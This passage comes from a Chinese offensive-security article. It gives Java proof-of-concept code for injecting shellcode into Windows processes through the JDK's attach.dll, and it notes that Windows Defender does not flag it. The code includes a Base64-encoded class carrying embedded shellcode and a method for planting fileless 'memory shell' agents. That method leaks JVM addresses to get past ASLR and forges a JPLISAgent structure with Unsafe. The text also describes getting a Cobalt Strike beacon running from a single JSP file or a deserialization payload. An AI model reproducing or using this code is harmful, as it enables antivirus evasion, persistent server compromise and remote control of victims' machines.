        }        Thread.sleep(4000);    }    public static long getHandleByPid(int pid)    {        Class cls= null;        long hProcess=-1;        try {            cls = Class.forName("sun.tools.attach.WindowsVirtualMachine");            for (Method m:cls.getDeclaredMethods()) {                if (m.getName().equals("openProcess"))                {                    m.setAccessible(true);                    Object result=m.invoke(cls,pid);                    System.out.println("pid :"+result);                    hProcess=Long.parseLong(result.toString());                }            }        } catch (Exception e) {            e.printStackTrace();        }        return hProcess;    }}
编译，执行：
成功执行shellcode，而且Windows Defender没有告警，天然免杀。毕竟，谁能想到有着合法签名安全可靠的Java.exe会作恶呢：）
至此，我们实现了Windows平台上的Java远程进程注入。另外，这个技术还有个额外效果，那就是当注入进程的PID设置为-1的时候，可以往当前Java进程注入任意Native代码，以实现不用JNI执行任意Native代码的效果。这样就不需要再单独编写JNI库来执行Native代码了，也就是说，上文提到的内存马防检测机制，不需要依赖JNI，只要纯Java代码也可以实现。
冰蝎3.0中提供了一键cs上线功能，采用的是JNI机制，中间需要上传一个临时库文件才能实现上线。现在利用这个技术，可以实现一个JSP文件或者一个反序列化Payload即可上线CS：
自定义类调用系统Native库函数
在上一小节Java原生远程进程注入中，我的POC里是通过反射创建了一个sun.tools.attach.VirtualMachineImpl类，然后再去调用类里面的enqueue这个Native方法。这时可能会有同学有疑惑，这个Native方法位于attach.dll，这个dll是JDK和Server-JRE默认自带的，但是这个sun.tools.attach.VirtualMachineImpl类所在的tools.jar包并不是每个JDK环境都有的。这个技术岂不是要依赖tools.jar？因为有些JDK环境是没有tools.jar的。当然，这个担心是没必要的。
我们只要自己写一个类，类的限定名为sun.tools.attach.VirtualMachineImpl即可。不过可能还会有疑问，我们自己写一个sun.tools.attach.VirtualMachineImpl类，但是如果某个目标里确实有tools.jar，那我们自己写的类在加载的时候就会报错，有没有一个更通用的方法呢？当然还是有的。
其实这个方法在冰蝎1.0版本的时候就已经解决了，那就是用一个自定义的classLoader。但是我们都知道classLoader在loadClass的时候采用双亲委托机制，也就是如果系统中已经存在一个类，即使我们用自定义的classLoader去loadClass，也会返回系统内置的那个类。但是如果我们绕过loadClass，直接去defineClass即可从我们指定的字节码数组里创建类，而且类名我们可以任意自定义，重写java.lang.String都没问题:) 然后再用defineClass返回的Class去实例化，然后再调用我们想调用的Native函数即可。因为Native函数在调用的时候只检测发起调用的类限定名，并不检测发起调用类的ClassLoader，这是我们这个方法能成功的原因。
比如我们自定义如下这个类：
package sun.tools.attach;
import java.io.IOException;import java.util.Scanner;
public class WindowsVirtualMachine {    static native void enqueue(long hProcess, byte[] stub,                            String cmd, String pipename, Object... args) throws IOException;
    static native long openProcess(int pid) throws IOException;
    public static void run(byte[] buf) {        System.loadLibrary("attach");        try {            enqueue(-1, buf, "test", "test", new Object[]{});        } catch (Exception e) {            e.printStackTrace();        }    }}
然后把这个类编译成class文件，把这个文件用Base64编码，然后写到如下POC里：
import java.io.*;import java.lang.reflect.InvocationTargetException;import java.lang.reflect.Method;import java.security.Permission;import java.util.Arrays;import java.util.Base64;
public class Poc {
    public static class Myloader extends ClassLoader //继承ClassLoader{        public Class get(byte[] b) {            return super.defineClass(b, 0, b.length);        }
    }
    public static void main(String[] args){
        try {
            String classStr="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";            Class result = new Myloader().get(Base64.getDecoder().decode(classStr));
            for (Method m:result.getDeclaredMethods())            {                System.out.println(m.getName());                if (m.getName().equals("run"))                {                    m.invoke(result,new byte[]{});                }            }        } catch (Exception e) {            e.printStackTrace();        }    }}
这样就可以通过自定义一个系统内置类来加载系统库函数的Native方法。
无文件落地Agent型内存马植入
可行性分析
前面我们讲到了目前Java内存马的分类：Agent型内存马和非Agent型内存马。由于非Agent型内存马注入后，会产生新的类和对象，同时还会产生各种错综复杂的相互引用关系，比如要创建一个恶意Filter内存马，需要先修改已有的FilterMap，然后新增FilterConfig、FilterDef，最后还要修改FilterChain，这一系列操作产生的脏数据过多，不够整洁。因此我还是认为Agent型内存马才是更理想的内存马。
但是目前来看，Agent型内存马的缺点也非常明显：
•磁盘有agent文件落地•需要上传文件，植入步骤复杂•如无写文件权限，则无法植入
众所周知，想要动态修改JVM中已经加载的类的字节码，必须要通过加载一个Agent来实现，这个Agent可以是Java层的agent.jar，也可以是Native层的agent.so，但是必须要有个agent。有没有一种方法可以既优雅又简洁的植入Agent型内存马呢？换句话说，有没有一种方法可以在不依赖额外Agent的情况下，动态修改JVM中已经加载的类的字节码呢？以前没有，现在有了：）
首先，我们先看一下通过Agent动态修改类的流程：
1.在客户端和目标JVM建立IPC连接以后，客户端会封装一个用来加载agent.jar的AttachOperation对象，这个对象里面有三个关键数据：actioName、libName和agentPath；2.服务端收到AttachOperation后，调用enqueue压入AttachOperation队列等待处理；3.服务端处理线程调用dequeue方法取出AttachOperation；4.服务端解析AttachOperation，提取步骤1中提到的3个参数，调用actionName为load的对应处理分支，然后加载libinstrument.so（在windows平台为instrument.dll），执行AttachOperation的On_Attach函数（由此可以看到，Java层的instrument机制，底层都是通过Native层的Instrument来封装的）；5.libinstrument.so中的On_Attach会解析agentPath中指定的jar文件，该jar中调用了redefineClass的功能；6.执行流转到Java层，JVM会实例化一个InstrumentationImpl类，这个类在构造的时候，有个非常重要的参数mNativeAgent： 
这个参数是long型，其值是一个Native层的指针，指向的是一个C++对象JPLISAgent。7.InstrumentationImpl实例化之后，再继续调用InstrumentationImpl类的redefineClasses方法，做稍许校验之后继续调用InstrumentationImpl的Native方法redefineClasses08.执行流继续走入Native层： 
继续跟入：
做了一系列判断之后，最终调用jvmtienv的redefineClasses方法执行类redefine操作：
接下来理一下思路，在上面的8个步骤中，我们只要能跳过前面5个步骤，直接从步骤6开始执行，即可实现我们的目标。那么问题来了，步骤6中在实例化InstrumentationImpl的时候需要的非常重要的mNativeAgent参数值，这个值是一个指向JPLISAgent对象的指针，这个值我们不知道。只有一个办法，我们需要自己在Native层组装一个JPLISAgent对象，然后把这个对象的地址传给Java层InstrumentationImpl的构造器，就可以顺利完成后面的步骤。
组装JPLISAgent
Native内存操作
想要在Native内存上创建对象，首先要获取可控的Native内存操作能力。我们知道Java有个DirectByteBuffer，可以提供用户申请堆外内存的能力，这也就说明DirectByteBuffer是有操作Native内存的能力，而DirectByteBuffer底层其实使用的是Java提供的Unsafe类来操作底层内存的，这里我们也直接使用Unsafe进行Native内存操作。
通过如下代码获取Unsafe：
Unsafe unsafe = null;
try {    Field field = sun.misc.Unsafe.class.getDeclaredField("theUnsafe");    field.setAccessible(true);    unsafe = (sun.misc.Unsafe) field.get(null);} catch (Exception e) {    throw new AssertionError(e);}
通过unsafe的allocateMemory、putlong、getAddress方法，可以实现Native内存的分配、读写。
分析JPLISAgent结构
接下来，就是分析JPLISAgent对象的结构了，如下：

JPLISAgent是一个复杂的数据结构。由上文中redefineClasses代码可知，最终实现redefineClasses操作的是*jvmtienv的redefineClasses函数。但是这个jvmtienv的指针，是通过jvmti(JPLISAgent)推导出来的，如下： 
而jvmti是一个宏：
而在执行到*jvmtienv的redefineClasses之前，还有多处如下调用都用到了jvmtienv：

因此，我们至少要保证我们自己组装的JPLISAgent对象需要成功推导出jvmtienv的指针，也就是JPLISAgent的mNormalEnvironment成员，其结构如下： 
可以看到这个结构里存在一个回环指针mAgent，又指向了JPLISAgent对象，另外，还有个最重要的指针mJVMTIEnv，这个指针是指向内存中的JVMTIEnv对象的，这是JVMTI机制的核心对象。另外，经过分析，JPLISAgent对象中还有个mRedefineAvailable成员，必须要设置成true。
接下来就是要确定JVMTIEnv的地址了。
定位JVMTIEnv
通过动态分析可知，0x000002E62D8EE950为JPLISAgent的地址，0x000002E62D8EE950+0x8（0x000002E62D8EEB60）为mJVMTIEnv,即指向JVMTIEnv指针的指针： 
转到该指针：
可以看到0x6F78A220即为JVMTIEnv对象的真实地址，通过分析发现，该对象存在于jvm模块的地址空间中，而且偏移量是固定的，那只要找到jvm模块的加载基址，加加上固定的偏移量即是JVMTIEnv对象的真实地址。但是，现代操作系统默认都开启了ASLR，因此jvm模块的基址并不可知。
信息泄露获取JVM基址
由上文可知，Unsafe提供了堆外内存的分配能力，这里的堆并不是OS层面的堆，而是Java层面的堆，无论是Unsafe分配的堆外地址，还是Java的堆内地址，其都在OS层的堆空间内。经过分析发现，在通过Unsafe分配一个很小的堆外空间时，这个堆外空间的前后内存中，存在大量的指针，而这些指针中，有一些指针指向jvm的地址空间。编写如下代码：
long allocateMemory = unsafe.allocateMemory(3);System.out.println("allocateMemory:"+Long.toHexString(allocateMemory));
输出如下：
定位到地址0x2e61a1b67d0：
可见前后有很多指针，绿色的那些指针，都指向jvm的地址空间：
但是，这部分指针并不可复现，也就是说这些指针相对于allocateMemory的偏移量和指针值都不是固定的，也就是说我们根本无法从这些动态的指针里去推导出一个固定的jvm模块基址。当对一个事物的内部运作机制不了解时，最高效的方法就是利用统计学去解决问题。于是我通过开发辅助程序，多次运行程序，收集大量的前后指针列表，这些指针中有大量是重复出现的，然后根据指针末尾两个字节，做了一个字典，当然只做2个字节的匹配，很容易出错，于是我又根据这些大量指针指向的指针，取末尾两个字节，又做了一个和前面一一对应的字典。这样我们就制作了一个二维字典，并根据指针重复出现的频次排序。POC运行的时候，会以allocateMemory开始，往前往后进行字典匹配，可以准确的确定jvm模块的基址。部分字典结构如下："'3920':'a5b0':'633920','fe00':'a650':'60fe00','99f0':'cccc':'5199f0','8250':'a650':'638250','d200':'fdd0':'63d200','da70':'b7e0':'67da70' 每个条目含有3个元素，第一个为指针末尾2字节，第二个元素为指针指向的指针末尾两个字节，第三个元素为指针与baseAddress的偏移量。基址确定了，jvmtienv的具体地址就确定了。当然拿到了jvm的地址，加上JavaVM的偏移量便可以直接获得JavaVM的地址。
开始组装
拿到jvm模块的基址后，就万事俱备了，下面准备装配JPLISAgent对象，代码如下：
 private static long getAgent(long jvmtiAddress)    {        Unsafe unsafe = getUnsafe();        long agentAddr=unsafe.allocateMemory(0x200);        long jvmtiStackAddr=unsafe.allocateMemory(0x200);        unsafe.putLong(jvmtiStackAddr,jvmtiAddress);        unsafe.putLong(jvmtiStackAddr+8,0x30010100000071eel);
        unsafe.putLong(jvmtiStackAddr+0x168,0x9090909000000200l);        System.out.println("long:"+Long.toHexString(jvmtiStackAddr+0x168));        unsafe.putLong(agentAddr,jvmtiAddress-0x234f0);
        unsafe.putLong(agentAddr+0x8,jvmtiStackAddr);        unsafe.putLong(agentAddr+0x10,agentAddr);        unsafe.putLong(agentAddr+0x18,0x00730065006c0000l);
        //make retransform env        unsafe.putLong(agentAddr+0x20,jvmtiStackAddr);        unsafe.putLong(agentAddr+0x28,agentAddr);        unsafe.putLong(agentAddr+0x30,0x0038002e00310001l);
        unsafe.putLong(agentAddr+0x38,0);        unsafe.putLong(agentAddr+0x40,0);        unsafe.putLong(agentAddr+0x48,0);        unsafe.putLong(agentAddr+0x50,0);
        unsafe.putLong(agentAddr+0x58,0x0072007400010001l);        unsafe.putLong(agentAddr+0x60,agentAddr+0x68);        unsafe.putLong(agentAddr+0x68,0x0041414141414141l);        return agentAddr;    }
入参为上一阶段获取的jvmti的地址，返回值为JPLISAgent的地址。
完整POC如下（跨平台）：
package net.rebeyond;

import sun.misc.Unsafe;
import java.lang.instrument.ClassDefinition;import java.lang.reflect.Constructor;import java.lang.reflect.Field;import java.lang.reflect.Method;import java.util.*;
public class PocWindows {    public static void main(String[] args) throws Throwable {
        Unsafe unsafe = getUnsafe();
        Thread.sleep(2000);        //System.gc();        //Thread.sleep(2000);        long allocateMemory = unsafe.allocateMemory(3);        System.out.println("allocateMemory:" + Long.toHexString(allocateMemory));        String patterns = "'3920':'a5b0':'633920','fe00':'a650':'60fe00','99f0':'cccc':'5199f0','8250':'a650':'638250','d200':'fdd0':'63d200','da70':'b7e0':'67da70','8d58':'a650':'638d58','f5c0':'b7e0':'67f5c0','8300':'8348':'148300','4578':'a5b0':'634578','b300':'a650':'63b300','ef98':'07b0':'64ef98','f280':'06e0':'60f280','5820':'4ee0':'5f5820','84d0':'a5b0':'5b84d0','00f0':'5800':'8300f0','1838':'b7e0':'671838','9f60':'b320':'669f60','e860':'08d0':'64e860','f7c0':'a650':'60f7c0','a798':'b7e0':'69a798','6888':'21f0':'5f6888','2920':'b6f0':'642920','45c0':'a5b0':'5d45c0','e1f0':'b5c0':'63e1f0','e128':'b5e0':'63e128','86a0':'4df0':'5b86a0','55a8':'64a0':'6655a8','8b98':'a650':'638b98','8a10':'b730':'648a10','3f10':'':'7b3f10','8a90':'4dc0':'5b8a90','e8e0':'0910':'64e8e0','9700':'7377':'5b9700','f500':'7073':'60f500','6b20':'a5b0':'636b20','b378':'bc50':'63b378','7608':'fb50':'5f7608','5300':'8348':'105300','8f18':'ff20':'638f18','7600':'3db0':'667600','92d8':'6d6d':'5e92d8','8700':'b200':'668700','45b8':'a650':'6645b8','8b00':'82f0':'668b00','1628':'a5b0':'631628','c298':'6765':'7bc298','7a28':'39b0':'5b7a28','3820':'4808':'233820','dd00':'c6a0':'63dd00','0be0':'a5b0':'630be0','aad0':'8e10':'7eaad0','4a98':'b7e0':'674a98','4470':'6100':'824470','6700':'4de0':'696700','a000':'3440':'66a000','2080':'a5b0':'632080','aa20':'64a0':'63aa20','5a00':'c933':'2d5a00','85f8':'4de0':'5b85f8','b440':'b5a0':'63b440','5d28':'1b80':'665d28','efd0':'a5b0':'62efd0','edc8':'a5b0':'62edc8','ad88':'b7e0':'69ad88','9468':'a8b0':'5b9468','af30':'b650':'63af30','e9e0':'0780':'64e9e0','7710':'b2b0':'667710','f528':'e9e0':'62f528','e100':'a5b0':'63e100','5008':'7020':'665008','a4c8':'a5b0':'63a4c8','6dd8':'e7a0':'5c6dd8','7620':'b5a0':'667620','f200':'0ea0':'60f200','d070':'d6c0':'62d070','6270':'a5b0':'5c6270','8c00':'8350':'668c00','4c48':'7010':'664c48','3500':'a5b0':'633500','4f10':'f100':'834f10','b350':'b7e0':'69b350','f5d8':'f280':'60f5d8','bcc0':'9800':'60bcc0','cd00':'3440':'63cd00','8a00':'a1d0':'5b8a00','0218':'6230':'630218','61a0':'b7e0':'6961a0','75f8':'a5b0':'5f75f8','fda8':'a650':'60fda8','b7a0':'b7e0':'69b7a0','f120':'3100':'81f120','ed00':'8b48':'4ed00','f898':'b7e0':'66f898','6838':'2200':'5f6838','e050':'b5d0':'63e050','bb78':'86f0':'60bb78','a540':'b7e0':'67a540','8ab8':'a650':'638ab8','d2b0':'b7f0':'63d2b0','1a50':'a5b0':'631a50','1900':'a650':'661900','6490':'3b00':'836490','6e90':'b7e0':'696e90','9108':'b7e0':'679108','e618':'b170':'63e618','6b50':'6f79':'5f6b50','cdc8':'4e10':'65cdc8','f700':'a1d0':'60f700','f803':'5000':'60f803','ca60':'b7e0':'66ca60','0000':'6a80':'630000','64d0':'a5b0':'6364d0','09d8':'a5b0':'6309d8','dde8':'bb50':'63dde8','d790':'b7e0':'67d790','f398':'0840':'64f398','4370':'a5b0':'634370','ca10':'1c20':'5cca10','9c88':'b7e0':'679c88','d910':'a5b0':'62d910','24a0':'a1d0':'6324a0','a760':'b880':'64a760','90d0':'a880':'5b90d0','6d00':'82f0':'666d00','e6f0':'a640':'63e6f0','00c0':'ac00':'8300c0','f6b0':'b7d0':'63f6b0','1488':'afd0':'641488','ab80':'0088':'7eab80','6d40':'':'776d40','8070':'1c50':'668070','fe88':'a650':'60fe88','7ad0':'a6d0':'667ad0','9100':'a1d0':'699100','8898':'4e00':'5b8898','7c78':'455':'7a7c78','9750':'ea70':'5b9750','0df0':'a5b0':'630df0','7bd8':'a1d0':'637bd8','86b0':'a650':'6386b0','4920':'b7e0':'684920','6db0':'7390':'666db0','abe0':'86e0':'63abe0','e960':'0ac0':'64e960','97a0':'3303':'5197a0','4168':'a5b0':'634168','ee28':'b7e0':'63ee28','20d8':'b7e0':'6720d8','d620':'b7e0':'67d620','0028':'1000':'610028','f6e0':'a650':'60f6e0','a700':'a650':'64a700','4500':'a1d0':'664500','8720':'':'7f8720','8000':'a650':'668000','fe38':'b270':'63fe38','be00':'a5b0':'63be00','f498':'a650':'60f498','d8c0':'b3c0':'63d8c0','9298':'b7e0':'699298','ccd8':'4de0':'65ccd8','7338':'cec0':'5b7338','8d30':'6a40':'5b8d30','4990':'a5b0':'634990','84f8':'b220':'5e84f8','cb80':'bbd0':'63cb80'";        patterns="'bbf8':'7d00':'5fbbf8','68f8':'17e0':'5e68f8','6e28':'e570':'5b6e28','bd48':'8e10':'5fbd48','4620':'9ff0':'5c4620','ca70':'19f0':'5bca70'"; //for windows_java8_301_x64        //patterns="'8b80':'8f10':'ef8b80','9f20':'0880':'f05f20','65e0':'4855':'6f65e0','4f20':'b880':'f05f20','7300':'8f10':'ef7300','aea0':'ddd0':'ef8ea0','1f20':'8880':'f05f20','8140':'8f10':'ef8140','75e0':'4855':'6f65e0','6f20':'d880':'f05f20','adb8':'ddd0':'ef8db8','ff20':'6880':'f05f20','55e0':'4855':'6f65e0','cf20':'3880':'f05f20','05e0':'4855':'6f65e0','92d8':'96d0':'eff2d8','8970':'8f10':'ef8970','d5e0':'4855':'6f65e0','8e70':'4350':'ef6e70','d2d8':'d6d0':'eff2d8','d340':'bf00':'f05340','f340':'df00':'f05340','2f20':'9880':'f05f20','1be0':'d8b0':'f6fbe0','8758':'c2a0':'ef6758','c340':'af00':'f05340','f5e0':'4855':'6f65e0','c5e0':'4855':'6f65e0','b2d8':'b6d0':'eff2d8','02d8':'06d0':'eff2d8','ad88':'ddb0':'ef8d88','62d8':'66d0':'eff2d8','7b20':'3d50':'ef7b20','82d8':'86d0':'eff2d8','0f20':'7880':'f05f20','9720':'8f10':'f69720','7c80':'5850':'ef5c80','25e0':'4855':'6f65e0','32d8':'36d0':'eff2d8','e340':'cf00':'f05340','ec80':'c850':'ef5c80','85e0':'add0':'6f65e0','9410':'c030':'ef9410','5f20':'c880':'f05f20','1340':'ff00':'f05340','b340':'9f00':'f05340','7340':'5f00':'f05340','35e0':'4855':'6f65e0','3f20':'a880':'f05f20','8340':'6f00':'f05340','4340':'2f00':'f05340','0340':'ef00':'f05340','22d8':'26d0':'eff2d8','e5e0':'4855':'6f65e0','95e0':'4855':'6f65e0','19d0':'d830':'f6f9d0','52d8':'56d0':'eff2d8','c420':'b810':'efc420','b5e0':'ddd0':'ef95e0','c2d8':'c6d0':'eff2d8','5340':'3f00':'f05340','df20':'4880':'f05f20','15e0':'4855':'6f65e0','a2d8':'a6d0':'eff2d8','9340':'7f00':'f05340','8070':'add0':'ef9070','f2d8':'f6d0':'eff2d8','72d8':'76d0':'eff2d8','6340':'4f00':'f05340','2340':'0f00':'f05340','3340':'1f00':'f05340','b070':'ddd0':'ef9070','45e0':'4855':'6f65e0','8d20':'add0':'ef9d20','6180':'8d90':'ef6180','8f20':'f880':'f05f20','8c80':'6850':'ef5c80','a5e0':'4855':'6f65e0','ef20':'5880':'f05f20','8410':'b030':'ef9410','b410':'e030':'ef9410','bf20':'2880':'f05f20','e2d8':'e6d0':'eff2d8','bd20':'ddd0':'ef9d20','12d8':'16d0':'eff2d8','9928':'8f10':'f69928','9e28':'8f10':'f69e28','4c80':'2850':'ef5c80','7508':'8f10':'ef7508','1df0':'d940':'f6fdf0'"; //for linux_java8_301_x64        long jvmtiOffset=0x79a220; //for java_8_271_x64        jvmtiOffset=0x78a280; //for windows_java_8_301_x64        //jvmtiOffset=0xf9c520; //for linux_java_8_301_x64        List> patternList = new ArrayList>();        for (String pair : patterns.split(",")) {            String offset = pair.split(":")[0].replace("'", "").trim();            String value = pair.split(":")[1].replace("'", "").trim();            String delta = pair.split(":")[2].replace("'", "").trim();            Map pattern = new HashMap();            pattern.put("offset", offset);            pattern.put("value", value);            pattern.put("delta", delta);            patternList.add(pattern);        }

        int offset = 8;        int targetHexLength=8; //on linux,change it to 12.        for (int j = 0; j < 0x2000; j++)  //down search        {
            for (int x : new int[]{-1, 1}) {                long target = unsafe.getAddress(allocateMemory + j * x * offset);                String targetHex = Long.toHexString(target);                if (target % 8 > 0 || targetHex.length() != targetHexLength) {                    continue;                }                if (targetHex.startsWith("a") || targetHex.startsWith("b") || targetHex.startsWith("c") || targetHex.startsWith("d") || targetHex.startsWith("e") || targetHex.startsWith("f") || targetHex.endsWith("00000")) {                    continue;                }                System.out.println("[-]start get " + Long.toHexString(allocateMemory + j * x * offset) + ",at:" + Long.toHexString(target) + ",j is:" + j);
                for (Map patternMap : patternList) {                    targetHex = Long.toHexString(target);
                    if (targetHex.endsWith(patternMap.get("offset"))) {                        String targetValueHex = Long.toHexString(unsafe.getAddress(target));                        System.out.println("[!]bingo.");                        if (targetValueHex.endsWith(patternMap.get("value"))) {                            System.out.println("[ok]i found agent env:start get " + Long.toHexString(target) + ",at  :" + Long.toHexString(unsafe.getAddress(target)) + ",j is:" + j);                            System.out.println("[ok]jvm base is " + Long.toHexString(target - Integer.parseInt(patternMap.get("delta"), 16)));                            System.out.println("[ok]jvmti object addr is " + Long.toHexString(target - Integer.parseInt(patternMap.get("delta"), 16) + jvmtiOffset));                            //long jvmenvAddress=target-Integer.parseInt(patternMap.get("delta"),16)+0x776d30;                            long jvmtiAddress = target - Integer.parseInt(patternMap.get("delta"), 16) + jvmtiOffset;                            long agentAddress = getAgent(jvmtiAddress);                            System.out.println("agentAddress:" + Long.toHexString(agentAddress));                            Bird bird = new Bird();                            bird.sayHello();                            doAgent(agentAddress);
                            //doAgent(Long.parseLong(address));
                            bird.sayHello();                            return;                        }
                    }                }
            }
        }    }
    private static long getAgent(long jvmtiAddress) {        Unsafe unsafe = getUnsafe();        long agentAddr = unsafe.allocateMemory(0x200);        long jvmtiStackAddr = unsafe.allocateMemory(0x200);        unsafe.putLong(jvmtiStackAddr, jvmtiAddress);        unsafe.putLong(jvmtiStackAddr + 8, 0x30010100000071eel);
        unsafe.putLong(jvmtiStackAddr + 0x168, 0x9090909000000200l);        System.out.println("long:" + Long.toHexString(jvmtiStackAddr + 0x168));        unsafe.putLong(agentAddr, jvmtiAddress - 0x234f0);
        unsafe.putLong(agentAddr + 0x8, jvmtiStackAddr);        unsafe.putLong(agentAddr + 0x10, agentAddr);        unsafe.putLong(agentAddr + 0x18, 0x00730065006c0000l);
        //make retransform env        unsafe.putLong(agentAddr + 0x20, jvmtiStackAddr);        unsafe.putLong(agentAddr + 0x28, agentAddr);        unsafe.putLong(agentAddr + 0x30, 0x0038002e00310001l);
        unsafe.putLong(agentAddr + 0x38, 0);        unsafe.putLong(agentAddr + 0x40, 0);        unsafe.putLong(agentAddr + 0x48, 0);        unsafe.putLong(agentAddr + 0x50, 0);
        unsafe.putLong(agentAddr + 0x58, 0x0072007400010001l);        unsafe.putLong(agentAddr + 0x60, agentAddr + 0x68);        unsafe.putLong(agentAddr + 0x68, 0x0041414141414141l);        return agentAddr;    }
